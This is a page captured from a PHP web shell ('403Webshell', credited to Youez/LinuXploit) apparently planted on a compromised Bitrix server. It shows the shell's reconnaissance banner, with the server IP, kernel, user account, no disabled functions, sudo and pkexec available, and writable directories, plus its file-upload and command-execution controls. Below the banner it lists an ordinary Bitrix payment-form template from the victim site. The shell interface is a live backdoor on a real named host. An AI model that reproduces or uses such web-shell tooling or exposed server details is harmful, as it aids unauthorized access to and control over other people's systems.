403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/cvetdv.ru/bitrix/modules/sale/handlers/paysystem/assist/template/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/bitrix/ext_www/cvetdv.ru/bitrix/modules/sale/handlers/paysystem/assist/template/template.php
<?
use Bitrix\Main\Localization\Loc;
Loc::loadMessages(__FILE__);

$context = \Bitrix\Main\Application::getInstance()->getContext();
?>
<div class="paysystem-yandex mb-4" id="paysystem-assest">
	<form id="paysystem-assest-form" action="<?=$params['URL'];?>" METHOD="POST">

	<p><?echo Loc::getMessage("SALE_HANDLERS_PAY_SYSTEM_ASSIST_PROMT"); ?></p>
	<p><?echo Loc::getMessage("SALE_HANDLERS_PAY_SYSTEM_ASSIST_ACCOUNT_NO"); ?>
		<?echo $payment->getField('ACCOUNT_NUMBER').Loc::getMessage("SALE_HANDLERS_PAY_SYSTEM_ASSIST_ORDER_FROM").$params['PAYMENT_DATE_INSERT']; ?></p>
	<p><?echo Loc::getMessage("SALE_HANDLERS_PAY_SYSTEM_ASSIST_ORDER_SUM"); ?>
	<?echo SaleFormatCurrency($params['PAYMENT_SHOULD_PAY'], $params['PAYMENT_CURRENCY']); ?></p>
	<?$comment = "Invoice ".$params['PAYMENT_ID']." (".$params['PAYMENT_DATE_INSERT'].")";?>

	<input type="hidden" name="Merchant_ID" value="<?=htmlspecialcharsbx($params['ASSIST_SHOP_IDP']);?>">
	<input type="hidden" name="OrderNumber" value="<?=htmlspecialcharsbx($params['PAYMENT_ID'])?>">
	<input type="hidden" name="OrderAmount" value="<?=(str_replace(",", ".", $params['PAYMENT_SHOULD_PAY']));?>">
	<input type="hidden" name="OrderCurrency" value="<?=(($params['PAYMENT_CURRENCY'] == "RUR") ? "RUB" : htmlspecialcharsbx($params['PAYMENT_CURRENCY']));?>">
	<input type="hidden" name="Delay" value="<?=htmlspecialcharsbx($params['ASSIST_DELAY'])?>">
	<input type="hidden" name="Language" value="<?=$context->getLanguage();?>">
	<input type="hidden" name="URL_RETURN_OK" value="<?=htmlspecialcharsbx($params['ASSIST_SUCCESS_URL']);?>">
	<input type="hidden" name="URL_RETURN_NO" value="<?=htmlspecialcharsbx($params['ASSIST_FAIL_URL']);?>">
	<input type="hidden" name="OrderComment" value="<?=htmlspecialcharsbx($comment)?>">
	<input type="hidden" name="Lastname" value="<?=htmlspecialcharsbx($params['BUYER_PERSON_NAME_LAST']);?>">
	<input type="hidden" name="Firstname" value="<?=htmlspecialcharsbx($params['BUYER_PERSON_NAME_FIRST']);?>">
	<input type="hidden" name="Middlename" value="<?=htmlspecialcharsbx($params['BUYER_PERSON_NAME_SECOND']);?>">
	<input type="hidden" name="Email" value="<?=htmlspecialcharsbx($params['BUYER_PERSON_EMAIL']);?>">
	<input type="hidden" name="Address" value="<?=htmlspecialcharsbx($params['BUYER_PERSON_ADDRESS']);?>">
	<input type="hidden" name="MobilePhone" value="<?=htmlspecialcharsbx($params['BUYER_PERSON_PHONE']);?>">
	<input type="hidden" name="CardPayment" value="<?=((int)$params['ASSIST_PAYMENT_CardPayment'] == 1) ? 1 : 0;?>">
	<input type="hidden" name="YMPayment" value="<?=((int)$params['ASSIST_PAYMENT_YMPayment'] == 1) ? 1 : 0;?>">
	<input type="hidden" name="QIWIPayment" value="<?=((int)$params['ASSIST_PAYMENT_QIWIPayment'] == 1) ? 1 : 0;?>">
	<input type="hidden" name="WMPayment" value="<?=((int)$params['ASSIST_PAYMENT_WebMoneyPayment'] == 1) ? 1 : 0;?>">

	<input type="submit" name="Submit" class="btn btn-lg btn-success pl-4 pr-4" style="border-radius: 32px;" value="<?=Loc::getMessage("SALE_HANDLERS_PAY_SYSTEM_ASSIST_ACTION");?>">
</form>

<p><strong><?echo GetMessage("SALE_HANDLERS_PAY_SYSTEM_ASSIST_NOTES_TITLE")?></strong></p>
<p><?echo GetMessage("SALE_HANDLERS_PAY_SYSTEM_ASSIST_NOTES")?></p>
<p><strong><?echo GetMessage("SALE_HANDLERS_PAY_SYSTEM_ASSIST_NOTES_TITLE1")?></strong></p>
<p><?echo GetMessage("SALE_HANDLERS_PAY_SYSTEM_ASSIST_NOTES1")?></p>

Youez - 2016 - github.com/yon3zu
LinuXploit